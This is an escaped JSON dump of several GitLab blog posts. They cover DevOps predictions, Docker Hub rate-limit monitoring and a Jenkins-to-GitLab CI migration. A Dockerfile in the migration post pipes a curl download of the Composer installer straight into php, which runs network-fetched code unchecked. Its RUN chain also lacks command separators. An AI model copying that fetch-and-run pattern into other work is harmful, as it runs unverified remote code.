right away, are prime candidates to rely on cold backups. 
With replication only, we'd be out of luck.\n\nNote: For [GitLab.com](https://gitlab.com/), we currently only provide system-level resiliency against data loss and do not provide user-level data recovery in general.\n\nPhoto by [Mathew Schwartz](https://unsplash.com/photos/sb7RUrRMaC4?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[803,9],{"slug":1763,"featured":6,"template":689},"delayed-replication-for-disaster-recovery-with-postgresql","content:en-us:blog:delayed-replication-for-disaster-recovery-with-postgresql.yml","Delayed Replication For Disaster Recovery With Postgresql","en-us/blog/delayed-replication-for-disaster-recovery-with-postgresql.yml","en-us/blog/delayed-replication-for-disaster-recovery-with-postgresql",{"_path":1769,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1770,"content":1776,"config":1782,"_id":1784,"_type":14,"title":1785,"_source":16,"_file":1786,"_stem":1787,"_extension":19},"/en-us/blog/devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more",{"title":1771,"description":1772,"ogTitle":1771,"ogDescription":1772,"noIndex":6,"ogImage":1773,"ogUrl":1774,"ogSiteName":673,"ogType":674,"canonicalUrls":1774,"schema":1775},"2022 DevOps predictions: AI, security, remote work & more","Want to see into the DevOps future? 
We’ve got insights to share, including the challenges for AI/ML and the impact of cloud-native on DevSecOps.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683162/Blog/Hero%20Images/tomasz-frankowski-kbufvkbfioe-unsplash.jpg","https://about.gitlab.com/blog/devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"2022 DevOps predictions: GitLab experts weigh in on AI, security, remote   work, and more\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2021-12-06\",\n      }",{"title":1777,"description":1772,"authors":1778,"heroImage":1773,"date":1779,"body":1780,"category":682,"tags":1781},"2022 DevOps predictions: GitLab experts weigh in on AI, security, remote   work, and more",[970],"2021-12-06","2022 is set to be a big year for [DevOps](/topics/devops/), especially when it comes to integrating AI and machine learning, pushing security further left in the development cycle, and expanding opportunities for open source and remote work. We’ve gathered eight predictions from the top minds here at GitLab about the DevOps platform and the DevOps industry overall.\n\n## 1. AI/ML adoption will increase and will be instrumental in addressing supply chain issues and labor shortages.\n\n[Taylor McCaslin](https://gitlab.com/tmccaslin), Group Manager, Product - ModelOps & Anti-Abuse, says:\n\n“We’re going to see increased adoption of [AI/ML](/direction/modelops/ai_assisted/) across all industries. With the labor and supply chain shortages and dramatic shifts in climate-related events, companies globally are having to learn to do more with less in even more dynamic environments. 
AI/ML is well-suited to solve some of these complex problems in industries we may not have expected [adoption from] this early.\n\nWe have started seeing governments embrace AI/ML technologies. When you think about it, governments are by definition inefficient, but they hold a lot of data that’s ripe territory for AI/ML to make an impact. Take the Internal Revenue Service in the U.S., for example. ML applied to process paper tax returns or to look for anomalies could reduce costs and increase revenue from catching tax fraud and data entry mistakes. Also, with Covid-19 not looking like it will go away anytime soon, there are huge data problems that are well suited for AI/ML in tracking and proving vaccination status. The list for AI/ML is endless.\n\nAI/ML still is a specialty field. So businesses need to have clear use cases for hiring data science teams and setting them up for success to deploy models into production. We still see friction between traditional DevOps technologies and new data science platforms slowing time to value and increasing the cost of developing AI/ML technologies, but those problems are becoming more understood and we’ll see that gap shorten over time reducing cost and complexities.”\n\n## 2. Businesses will continue to integrate security more tightly into DevOps and create DevSecOps teams to reduce risk, speed deployment, and gain a competitive advantage.\n\n[Johnathan Hunt](https://gitlab.com/JohnathanHunt), Vice President of Security, says:\n\n“The [DevSecOps](/blog/gitlab-is-setting-standard-for-devsecops/) practice will continue to increase in 2022 as more organizations understand the efficiencies and improved security of this strategy. Further, those that are currently leveraging DevSecOps as part of their development practice are realizing the benefits with fewer vulnerabilities, faster deployments, less time spent in corrective actions, and an overall reduction of risk. 
Ultimately, this will provide companies with a differentiated approach, leading to competitive advantages in their space.\n\nDevSecOps is important to prioritize due to the increased threat landscape that remote work models introduce. It is imperative that companies focus on transformative ways to protect their product and data to effectively manage their overall risk posture. DevSecOps is a proven strategy that reduces risk and security incidents while allowing faster and more secure code deployments.”\n\n## 3. Two of the biggest buzzwords of 2021 will take divergent paths next year: Kubernetes will play a fundamental role in DevSecOps, while zero trust will see only moderate gains.\n\nHunt says:\n\n“DevOps users have come to realize the benefits of operating security controls natively within Kubernetes rather than separate tools and separate teams adding steps to the process. This is a fundamental component to furthering the DevSecOps story. Additionally, the [Kubernetes](/blog/gitlab-kubernetes-agent-on-gitlab-com/) platform is continuing to evolve and adapt to the need for greater control and automation within reach of DevOps users leading to the natural and highly advantageous shift left strategy.\n\nMeantime, although we are seeing an increase in the implementation of certain zero trust principles, overall the industry has been slow to respond. Much of this is due to the understanding, complexity, and difficulty of implementing full zero-trust models within the tech stack. I predict 2022 will, at best, see a moderate gain in the adoption of [zero trust](/blog/questions-regarding-our-zero-trust-efforts/).”\n\n## 4. 
Secure software supply chain will become a standard element of security strategy for government organizations.\n\n[Bob Stevens](https://gitlab.com/bstevens1), Area Vice President of Public Sector, says:\n\n“Federal agencies are starting to tackle software supply chain security, spurred by guidance from NIST and actions outlined in Executive Orders issued in early 2021. While these guidelines are critical to success, agencies will rise to the challenge of implementing new security measures instead of waiting to act. Regardless of the publication of final guidance, CIOs will implement actions for software supply chain security to proactively defend their agencies. CIOs know that enhancing cyber defenses immediately is crucial to outsmarting adversaries, and they will not delay in enacting change. Once guidelines are final, CIOs will adjust their policies to meet best practices.\n\nTo ensure security in the software supply chain, people, processes, and technologies need to work together in unison. This includes code that has been examined by numerous security personnel, build processes that take place in the open, and high-quality software that is tested and trusted. Software factories and contractors that work with them will also need to put in place a comprehensive and continuously monitored software bill of materials (SBOM), allowing everyone touching the software to fully understand the dependencies and vulnerabilities of their ecosystems.\n\nA DevOps platform can address many important security considerations. With security scanners built into the development process, agencies can scan every line of code as it is committed, allowing developers to identify and remediate vulnerabilities before they are pushed.“\n\n## 5. Cloud adoption will extend to other parts of the development life cycle, including developers’ own environments. 
\n\n[Brendan O’Leary](https://gitlab.com/brendan), Staff Developer Evangelist, says:\n\n“I still see a lot of enterprises or individual teams that find themselves at [various phases of DevOps](/blog/welcome-to-the-devops-platform-era/). So I believe that 2022 will bring a shift towards platforms - either through DIY or adoption of a DevOps platform. We’ll see more adoption of cloud technologies for other parts of the development lifecycle as well, such as developers’ own environments.”\n\n## 6. Open source will grow beyond a common software development practice to a full business model embraced by organizations.\n\n[Cesar Saavedra](https://gitlab.com/csaavedra1), Technical Marketing Manager, says:\n\n“Open source growth will continue in the future, and not just as a way to develop software but also as a business model. Not only have companies realized the need to be [digital leaders](https://www.capgemini.com/wp-content/uploads/2017/07/The_Digital_Advantage__How_Digital_Leaders_Outperform_their_Peers_in_Every_Industry.pdf) to be successful in the market, but also large commercial vendors are becoming open source and switching to this business model to stay competitive and open-source startups have caught [the interest of investors](https://techcrunch.com/2021/06/26/2170552/). Open source is taking over the software market. In fact, the Open Source Services Market is [predicted to grow](https://www.businesswire.com/news/home/20201113005374/en/66.84-Billion-Open-Source-Services-Market-by-Industry-Service-Type-and-Geography---Global-Forecast-to-2026---ResearchAndMarkets.com) at a CAGR of ~21.75% with a value expected to reach $66.84 billion by 2026. 
Another proof point of this growth is that [recent surveys show](https://www.datadoghq.com/container-report/#10) that the most popular container images are all based on open source software, which indicates this growing adoption trend of open source.\n\nAdopting open source into your business model is a complex decision and process. If you’re a successful company with a proprietary software product, it’s just a matter of time before a competitor with an open source offering will appear in your market segment. In this case, you will most likely need to switch your business model to one suited for open source software. For example, you will need to switch from license+subscription revenues to just subscription. Another big decision to make is whether or not to open source your software. Many software products that started as proprietary software converted to open source licensing, e.g. Adobe Flex, Visual Studio Code, .NET framework, PowerShell, Solaris. Open sourcing your software product usually goes hand-in-hand with adopting an open source business model of subscription-based revenues.\n\nYou also will need to contribute back to the open source community by making your enhancements and fixes to your product available in your open source project. In fact, to be successful in the open source market, you have to commit resources to help develop open source projects.”\n\n## 7. The open source community will grow significantly as a result of the acceleration of digital-first and cloud-native companies.\n\nSaavedra says: \n\n“The cloud helped accelerate the adoption of open source software because it allowed companies to scale up without incurring large costs in software licensing (open source subscription models are less expensive than proprietary software). 
Furthermore, open source software fosters collaboration among the brightest minds no matter where around the globe they reside, bringing together the power of the community and benefiting developers, organizations, and vendors alike. As a result, developers and organizations continue to adopt and contribute to open source projects due to a low entry barrier, accessibility, and cost. The Covid-19 pandemic [accelerated this adoption even more](https://venturebeat.com/2021/01/26/how-the-pandemic-is-accelerating-enterprise-open-source-adoption/) due to the switch to remote work by organizations that now have access to a new set of developer talent well versed in open source. The acceleration of digital-first and cloud-native companies will increase the use of open source, which will, in turn, demand more and more open source developers. The result will be an increase in the size of the open source community worldwide.”\n\n## 8. All-remote will become a prevailing work environment as a means to attract and retain talent.\n\nDarren Murph, Head of Remote, says:\n\n“All-remote and all-colocated will become the prevailing environments. Hybrid-remote will be broadly tested but will be rife with friction and dysfunction due to a lack of understanding in its implementation. The terminology also will evolve. For some organizations, hybrid will end up meaning ‘remote-first with an office for special events,’ while those who attempt to force knowledge workers into a more rigid in-office schedule will struggle to retain employees. \n\nDedicated leadership surrounding remote transitions and overall future-of-work strategy will increase in 2022. What GitLab pioneered has served as [a blueprint for organizations](/company/culture/all-remote/head-of-remote/) like Facebook, Dropbox, Okta, LinkedIn, VMWare, and other tech firms. Next year, industries beyond tech will begin to embrace remote work and create awareness for the intrinsic link between organizational design and talent brand. 
Organizations that rigidly force knowledge workers back into the office will see above-average attrition rates. With two years of remote work habits being ingrained, top talent will demand continued flexibility. Many organizations that have resisted investing in creating excellent remote work infrastructure will be forced to do so to compete with more flexible rivals. \n\nA well-built remote work plan will be seen as a hedge against future crises. Just as organizations are currently expected to have succession and security plans, having a remote work strategy will be critical to business continuity. Organizations will also need to work hard to establish psychological safety. As people resume social gatherings, employers have an opportunity to lean into the culture that is built outside of work and create strategies for that to be shared within the workplace.”",[685,865,9],{"slug":1783,"featured":6,"template":689},"devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more","content:en-us:blog:devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more.yml","Devops Predictions Gitlab Experts Weigh In On Ai Security Remote Work And More","en-us/blog/devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more.yml","en-us/blog/devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more",{"_path":1789,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1790,"content":1796,"config":1803,"_id":1805,"_type":14,"title":1806,"_source":16,"_file":1807,"_stem":1808,"_extension":19},"/en-us/blog/docker-hub-rate-limit-monitoring",{"title":1791,"description":1792,"ogTitle":1791,"ogDescription":1792,"noIndex":6,"ogImage":1793,"ogUrl":1794,"ogSiteName":673,"ogType":674,"canonicalUrls":1794,"schema":1795},"How to make Docker Hub rate limit monitoring a breeze","Docker Hub Rate Limits are enforced and we need to find ways to monitor the remaining pull requests. 
Explore some ways to create a monitoring plugin for Nagios/Icinga/Sensu/Zabbix and test-drive a new Prometheus exporter in combination with Grafana.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681749/Blog/Hero%20Images/vidarnm-unsplash.jpg","https://about.gitlab.com/blog/docker-hub-rate-limit-monitoring","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to make Docker Hub rate limit monitoring a breeze\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Michael Friedrich\"}],\n        \"datePublished\": \"2020-11-18\",\n      }",{"title":1791,"description":1792,"authors":1797,"heroImage":1793,"date":1799,"body":1800,"category":801,"tags":1801},[1798],"Michael Friedrich","2020-11-18","\n\nWhen we learned about the [Docker Hub Rate Limit](/blog/mitigating-the-impact-of-docker-hub-pull-requests-limits/), we thought about ways to mitigate and analyse the new situation. Container images are widely used and adopted for sandbox environments in [CI/CD pipelines](/solutions/continuous-integration/) and cloud-native production environments with app deployment in [Kubernetes clusters](/solutions/kubernetes/).\n\n## What is meant by Docker Hub limits?\n\nEach `docker pull` request toward the central `hub.docker.com` container registry is being counted. When a defined limit is reached, future requests are blocked and might be delayed into the next free window. [CI/CD](/topics/ci-cd/) jobs cannot be executed anymore after receiving a HTTP error `429 - too many requests` and similar errors will be seen in production deployment logs for Kubernetes.\n\nDocker defines this limit with 100 anonymous requests every six hours for the client's source IP address. If you have multiple container deployments behind an IP address, for example a company DMZ using a NAT, this limit can be reached very fast. 
A similar problem happens with watchtower tools which try to keep your container images updated, for example on your self-managed GitLab Runner. The limit can be raised by logging in, and by getting a paid subscription.\n\nThe question is: Where can you see the current limit and the remaining pull requests?\n\n### How to check the Docker Hub request limit?\n\nThe [Docker documentation](https://docs.docker.com/docker-hub/download-rate-limit/#how-can-i-check-my-current-rate) suggests to use CLI commands which invoke `curl` HTTP requests against the Docker Hub registry and parse the JSON response with [jq](https://stedolan.github.io/jq/).\n\nDefine the `IMAGE` variable once for the following CLI commands to use:\n\n```shell\n$ IMAGE=\"ratelimitpreview/test\"\n```\n\nObtain a token for authorization. Optionally print the variable value to verify its content.\n\n```shell\n$ TOKEN=$(curl \"https://auth.docker.io/token?service=registry.docker.io&scope=repository:$IMAGE:pull\" | jq -r .token)\n\n$ echo $TOKEN\n```\n\nThe next step is to simulate a `docker pull` request. Instead of using `GET` as HTTP request method, a `HEAD` request is sent which does not count toward the rate limit. The response headers contain the keys `RateLimit-Limit` and `RateLimit-Remaining`.\n\n```shell\n$ curl --head -H \"Authorization: Bearer $TOKEN\" https://registry-1.docker.io/v2/$IMAGE/manifests/latest\n```\n\nThe limit in the example is `2500` with remaining `2495` pull requests. `21600` defines the limit time window as six hours.\n\n```\nRateLimit-Limit: 2500;w=21600\nRateLimit-Remaining: 2495;w=21600\n```\n\n`RateLimit-Reset` can be returned too, this will be the remaining time until the limits are reset.\n\n### Create a monitoring script\n\nThe CLI commands can be turned into a programming language of your choice which provides methods for HTTP requests and better response parsing. The algorithm needs to follow these steps:\n\n* Obtain an authorization token from Docker Hub. 
Username/password credentials can be optionally provided, otherwise the request happens anonymously.\n* Send a `HEAD` request to the Docker Hub registry and simulate a `docker pull` request\n* Parse the response headers and extract the values for `RateLimit-Limit` and `RateLimit-Remaining`\n* Print a summary of the received values\n\nA plugin script which can be used by Nagios/Icinga/Sensu/Zabbix and others has additional requirements. It needs to implement the [Monitoring Plugins API specification](https://www.monitoring-plugins.org/doc/guidelines.html):\n\n* Print the limit and remaining count\n* Calculate a state: Ok, Warning, Critical, Unknown and print a helpful text on the shell\n* Add optional warning/critical thresholds for the remaining count. Whenever the count is lower than the threshold, the state changes to Warning/Critical and the exit code changes: `OK=0, Warning=1, Critical=2, Unknown=3`\n* Collect limit values as performance metrics for graphing and visualization\n* Add verbose mode and timeout parameters as plugin development best practices. If Docker Hub does not respond within 10 seconds as default, the plugin exits and returns `Unknown` as state.\n\nYou can download the [check_docker_hub_limit.py plugin script](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/check-docker-hub-limit) and integrate it into your monitoring environment.\n\n#### Use the monitoring plugin script\n\nThe [check_docker_hub_limit.py plugin script](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/check-docker-hub-limit) plugin is written in Python 3 and requires the `requests` library. 
Follow the [installation instructions](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/check-docker-hub-limit#installation) and run the plugin script with the `--help` parameter to see all available options:\n\n```\n$ python check_docker_hub_limit.py --help\n\nusage: check_docker_hub_limit.py [-h] [-w WARNING] [-c CRITICAL] [-v] [-t TIMEOUT]\n\nVersion: 2.0.0\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -w WARNING, --warning WARNING\n                        warning threshold for remaining\n  -c CRITICAL, --critical CRITICAL\n                        critical threshold for remaining\n  -v, --verbose         increase output verbosity\n  -t TIMEOUT, --timeout TIMEOUT\n                        Timeout in seconds (default 10s)\n```\n\nRun the script to fetch the current remaining count. The plugin script exit code returns `0` being OK.\n\n```\n$ python3 check_docker_hub_limit.py\nOK - Docker Hub: Limit is 5000 remaining 4997|'limit'=5000 'remaining'=4997\n\n$ echo $?\n0\n```\n\nSpecify the warning threshold with `10000` pulls, and the critical threshold with `3000`.\nThe example shows how the state changes to `WARNING` with a current count of `4999` remaining\npull requests. The plugin script exit code changes to `1`.\n\n```\n$ python3 check_docker_hub_limit.py -w 10000 -c 3000\nWARNING - Docker Hub: Limit is 5000 remaining 4999|'limit'=5000 'remaining'=4999\n\n$ echo $?\n1\n```\n\nSpecify a higher critical threshold with `5000`. 
When the remaining count goes below this value,\nthe plugin script returns `CRITICAL` and changes the exit state into `2`.\n\n```\n$ python3 check_docker_hub_limit.py -w 10000 -c 5000\nCRITICAL - Docker Hub: Limit is 5000 remaining 4998|'limit'=5000 'remaining'=4998\n\n$ echo $?\n2\n```\n\nWhen a timeout is reached, or another error is thrown, the exit state switches to `3` and the output state becomes `UNKNOWN`.\n\n### Use a Prometheus exporter for rate limit metrics\n\n[Prometheus](https://prometheus.io/) scrapes metrics from HTTP endpoints. There is a variety of exporters for Prometheus to monitor host systems, HTTP endpoints, containers, databases, etc. Prometheus provides [client libraries](https://prometheus.io/docs/instrumenting/clientlibs/) to make it easier to start writing your own custom exporter. The metrics need to be exported in a [defined format](https://prometheus.io/docs/instrumenting/exposition_formats/).\n\nThe Docker Hub limit values can be fetched with obtaining an authorization token first, and then sending a `HEAD` request shown above. The code algorithm follows the ideas of the monitoring plugin. Instead of printing the values onto the shell, the metric values are exposed with an HTTP server. The Prometheus client libraries provide this functionality built-in.\n\nWe have created a [Prometheus Exporter for Docker Hub Rate Limits](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/docker-hub-limit-exporter) using the [Python client library](https://github.com/prometheus/client_python). The repository provides a demo environment with `docker-compose` which starts the exporter, Prometheus and Grafana.\n\nEnsure that [docker-compose is installed](https://docs.docker.com/compose/install/) and clone/download the repository. 
Then run the following commands:\n\n```\n$ cd example/docker-compose\n\n$ docker-compose up -d\n```\n\nNavigate to `http://localhost:3030` to access Grafana and explore the demo environment with the pre-built dashboard.\n\n![Grafana dashboard for Docker Hub Limit Prometheus Exporter](https://about.gitlab.com/images/blogimages/docker-hub-limit-monitoring/grafana_prometheus_docker_hub_limit_exporter_demo.png){: .shadow.medium.center}\n\nGrafana dashboard for Docker Hub Limits\n{: .note.text-center}\n\n### More monitoring/observability ideas\n\nUse the steps explained in this blog post to add Docker Hub limit monitoring. Evaluate the Prometheus exporter or the check plugin, or create your own monitoring scripts. Fork the repositories and send a MR our way!\n\n* [check-docker-hub-limit for Nagios/Icinga/Zabbix/Sensu](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/check-docker-hub-limit)\n* [docker-hub-limit-exporter for Prometheus](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/docker-hub-limit-exporter)\n\nThe Prometheus exporter and the monitoring plugin script can help to see trends and calculate usage over time. Use your own local (GitLab) container registry or one of the available caching methods described in these blog posts:\n\n* [Cache Docker images in your CI/CD infrastructure](/blog/mitigating-the-impact-of-docker-hub-pull-requests-limits/). Use this resource for possible solutions around caching and proxying.\n* [Use the Dependency Proxy](/blog/minor-breaking-change-dependency-proxy/). Learn more about the GitLab Dependency Proxy being made open source in the future.\n* [#everyonecancontribute cafe: Docker Hub Rate Limit: Mitigation, Caching and Monitoring](https://everyonecancontribute.com/post/2020-11-04-cafe-7-docker-hub-rate-limit-monitoring/). This is a community meetup hosted by Developer Evangelists at GitLab. 
The blog post includes a video with more insights and discussion.\n\nPhoto by [Vidar Nordli-Mathisen](https://unsplash.com/@vidarnm) from [Unsplash](https://www.unsplash.com).\n{: .note}\n",[845,685,1038,9,1802],"production",{"slug":1804,"featured":6,"template":689},"docker-hub-rate-limit-monitoring","content:en-us:blog:docker-hub-rate-limit-monitoring.yml","Docker Hub Rate Limit Monitoring","en-us/blog/docker-hub-rate-limit-monitoring.yml","en-us/blog/docker-hub-rate-limit-monitoring",{"_path":1810,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1811,"content":1817,"config":1823,"_id":1825,"_type":14,"title":1826,"_source":16,"_file":1827,"_stem":1828,"_extension":19},"/en-us/blog/docker-my-precious",{"title":1812,"description":1813,"ogTitle":1812,"ogDescription":1813,"noIndex":6,"ogImage":1814,"ogUrl":1815,"ogSiteName":673,"ogType":674,"canonicalUrls":1815,"schema":1816},"Continuous integration: From Jenkins to GitLab using Docker","We're migrating all of our working tools to open source ones, and moving to GitLab has made all the difference.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667509/Blog/Hero%20Images/continuous-integration-from-jenkins-to-gitlab-using-docker.jpg","https://about.gitlab.com/blog/docker-my-precious","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Continuous integration: From Jenkins to GitLab using Docker\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Abdulkader Benchi\"}],\n        \"datePublished\": \"2017-07-27\",\n      }",{"title":1812,"description":1813,"authors":1818,"heroImage":1814,"date":1820,"body":1821,"category":10,"tags":1822},[1819],"Abdulkader Benchi","2017-07-27","\n\n Here at [Linagora](https://linagora.com/), we are migrating all our working tools to open source ones. 
Yes, we are an open source company with open source lovers.\n\n\u003C!-- more -->\n\nAmong these different tools were the [Atlassian](https://www.atlassian.com/) development tools. We decided to switch to GitLab and it started making all the difference. Indeed, GitLab includes Git repository management, issue tracking, code review, an IDE, activity streams, wikis, and more. It's worth mentioning that GitLab has built-in [Continuous Integration (CI) and Continuous Deployment (CD)](/topics/ci-cd/) to test, build, and deploy our code. We can easily monitor the progress of our tests and build pipelines. What we love about the CI provided by GitLab is the fact that it supports Docker. Indeed, GitLab allows us to use custom [Docker](https://www.docker.com/) images, spin up services as part of testing, build new Docker images, even run on [Kubernetes](https://kubernetes.io/).\n\nIf you are a Docker lover and you want to see how to transform [Jenkins](https://jenkins.io/) CI to GitLab CI using Docker, then you are in the right place.\n\n### Jenkins job\n\nLet’s have a look at our Jenkins Job.\n\n```\nMONGOPORT=23500\nBASEDIR=`pwd`\n\n# Update tools\n(cd repo && composer update)\n\n# Run code style checker\n./repo/vendor/bin/phpcs -p --standard=repo/vendor/sabre/dav/tests/phpcs/ruleset.xml --report-checkstyle=checkstyle.xml repo/lib/\n\n# Cleanup\nrm -rf mongodb\nrm -f mongo.pid\nrm -f mongo.log\nmkdir -p mongodb\n\n\n# Start temporary mongo server\nmongod --dbpath mongodb \\\n       --port $MONGOPORT \\\n       --pidfilepath $BASEDIR/mongo.pid \\\n       --logpath mongo.log \\\n        --fork\n\nsleep 2\n\n# Configure\ncat \u003C\u003CEOF > repo/config.json\n{\n  \"webserver\": {\n    \"baseUri\": \"/\",\n    \"allowOrigin\": \"*\"\n  },\n  \"database\": {\n    \"esn\": {\n      \"connectionString\" : \"mongodb://localhost:$MONGOPORT/\",\n      \"db\": \"esn\",\n      \"connectionOptions\": {\n        \"w\": 1,\n        \"fsync\": true,\n        \"connectTimeoutMS\": 
10000\n      }\n    },\n    \"sabre\": {\n      \"connectionString\" : \"mongodb://localhost:$MONGOPORT/\",\n      \"db\": \"sabredav\",\n      \"connectionOptions\": {\n        \"w\": 1,\n        \"fsync\": true,\n        \"connectTimeoutMS\": 10000\n      }\n    }\n  },\n  \"esn\": {\n    \"apiRoot\": \"http://localhost:8080/api\"\n  }\n}\nEOF\n\n# Run unit tests\n(cd repo/tests && ../vendor/bin/phpunit \\\n    --coverage-clover=$BASEDIR/clover.xml \\\n    --log-junit=$BASEDIR/junit.xml \\\n    .)\n\n# Clean up\nkill `cat mongo.pid`\n```\n\nI know, it is horrible to read this configuration, but you know we have to configure everything from A to Z in Jenkins. I can confirm that this job is one of the simplest jobs we have, because it depends on only one external service, “MongoDB.” We passed almost half of this job configuring this external service, starting it, cleaning it and killing it. Whereas, our main job is only about 10 lines. Furthermore, we suppose that on the Jenkins machine, we already have installed PHP, all PHP plugins and composer. So if we change the machine we have to reconfigure the new machine before starting using it. Docker… help please.\n\n![Docker help us](https://about.gitlab.com/images/blogimages/sos-docker.jpg){: .shadow}\u003Cbr>\n\n### GitLab job\n\nBefore starting, it's worth mentioning that good documentation about this part is presented [here](https://docs.gitlab.com/ee/ci/docker/using_docker_images.html). If you got it right, all GitLab’s CI configuration is to be done in a file called .gitlab-ci.yml. 
I will start presenting the final result before discussing the details:\n\n```\nimage: linagora/php-deps-composer:5.6.30\n\nservices:\n  - mongo:3.2\n\nstages:\n  - build\n  - deploy_dev\n\nbuild:\n  stage: build\n  script:\n    - composer up\n    - cp config.tests.json config.json\n    - ./vendor/bin/phpcs -p --standard=vendor/sabre/dav/tests/phpcs/ruleset.xml --report-checkstyle=checkstyle.xml lib/\n    - cd tests\n    - ../vendor/bin/phpunit --coverage-clover=${CI_PROJECT_DIR}/clover.xml --log-junit=${CI_PROJECT_DIR}/junit.xml .\n\ndeploy_dev:\n  stage: deploy_dev\n  only:\n    - master\n  script:\n    - cd /srv/sabre.dev\n    - git fetch --all\n    - git checkout ${CI_COMMIT_SHA}\n    - composer up\n```\n\n### Migration procedure\n\nWe start defining the image of which of GitLab’s Docker executors will run to perform the CI tasks. This is done by using the image keyword (line 1). This is a custom image we build to provide all the dependencies we need for our CI tasks. Here is the corresponding Dockerfile:\n\n```\nFROM php:5.6.30\n\nMAINTAINER Linagora Folks \u003Clgs-openpaas-dev@linagora.com>\n\nRUN apt-get update \\\n    apt-get -y install unzip git php5-curl php5-dev php-amqplib \\\n    docker-php-ext-install bcmath \\\n    pecl install mongo \\\n    docker-php-ext-enable mongo \\\n    curl https://getcomposer.org/installer | php \\\n    mv composer.phar /usr/local/bin/composer.phar \\\n    ln -s /usr/local/bin/composer.phar /usr/local/bin/composer\n```\n\nAs I mentioned before, our CI requires an external MongoDB service. But this time, Docker is here to do the magic. It helps us with configuring, starting and killing the service correctly. All what we have to do is to declare mongo as a service (line 4), et voilà!\n\nNow we have set up our environment, we can leverage script tag to test our code (lines 13–17) and deploy it (lines 24–27). 
It is worth noting that config.test.json contains all the configuration we have had in Jenkins (Lines 28–56 from Jenkins configuration).\n\n#### Running the GitLab job locally\n\nWe can easily test our GitLab builds locally using [GitLab Runner](https://gitlab.com/gitlab-org/gitlab-runner/blob/master/docs/commands/README.md). Here is the procedure:\n\n* Install it locally, either using a package repository or directly from here. If you do not want to install the GitLab Runner locally, you can always leverage Docker to do so. Have a look [here](https://gitlab.com/gitlab-org/gitlab-runner/issues/312).\n* Run the build: gitlab-runner exec docker {my-job}. Whereas, my-job is the name of the job defined in .gitlab-ci.yml. In our case, it is called build.\n\n#### Wrap up\n\nAs you can see, our CI job becomes easier to read thanks to GitLab and Docker. Along the same lines, we do not need to configure our machine to run tests anymore. Docker has got our back. In my opinion, the most important advantage of using Docker to run tests is to guarantee that our tests are always being run in the same conditions each time. 
These tests are totally isolated (and also independent) from the machine on which they run.\n\nThis post originally appeared on _[Medium](https://medium.com/linagora-engineering/docker-my-precious-6efbce900dcb)_.\n\n### About the Guest Author\n\nAbdulkader Benchi is the Javascript team leader at [Linagora](https://linagora.com/careers).\n",[9,1036],{"slug":1824,"featured":6,"template":689},"docker-my-precious","content:en-us:blog:docker-my-precious.yml","Docker My Precious","en-us/blog/docker-my-precious.yml","en-us/blog/docker-my-precious",{"_path":1830,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1831,"content":1837,"config":1844,"_id":1846,"_type":14,"title":1847,"_source":16,"_file":1848,"_stem":1849,"_extension":19},"/en-us/blog/donatinator-open-source-donation-platform",{"title":1832,"description":1833,"ogTitle":1832,"ogDescription":1833,"noIndex":6,"ogImage":1834,"ogUrl":1835,"ogSiteName":673,"ogType":674,"canonicalUrls":1835,"schema":1836},"The Donatinator: Simple donation solution for charities","This guest author shares his passion project: a free and open source solution for small charities and non-profits to accept donations online.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679940/Blog/Hero%20Images/donatinator-open-source.jpg","https://about.gitlab.com/blog/donatinator-open-source-donation-platform","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The Donatinator: A simple, secure way to accept donations to your charity or non-profit\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Andrew Chilton\"}],\n        \"datePublished\": \"2019-02-06\",\n      }",{"title":1838,"description":1833,"authors":1839,"heroImage":1834,"date":1841,"body":1842,"category":10,"tags":1843},"The Donatinator: A simple, secure way to accept donations to your charity or non-profit",[1840],"Andrew Chilton","2019-02-06","\n\nMany small non-profits or charity 
organizations all over the world find it really difficult to accept one-off donations or set up monthly subscriptions online. I know this from firsthand experience.\n\nLast year my wife came to me asking how the organization she volunteers at – a mothers’ support group – could accept donations on their website. My first thought was that the (free) hosting provider they were using would have a feature to do that, but no, not unless you pay, and for a small charity even $10 or $20 per month is too expensive.\n\nMy second thought was to investigate hosting or donation portals. Here's where the journey started.\n\n## Donation platforms offer a mixed bag\n\nAfter looking at various donation platforms, we realised that many differences exist and that you can't always have it all. Some of them:\n\n* Are only http unless you pay up front.\n* Support single donations OR subscriptions, but not both.\n* Are based around a fundraising model (to attain a target amount) but don't support ongoing payments.\n* Are US only, but since we're in New Zealand we needed something that would work here.\n* Provide an iframe payment page but not all.\n* Have a free tier but others required payment from day 1.\n* Don't have a team plan such that members of the charity committee can log in and administer the portal.\n\n## Looking for an open source solution\n\nI kept thinking to myself that 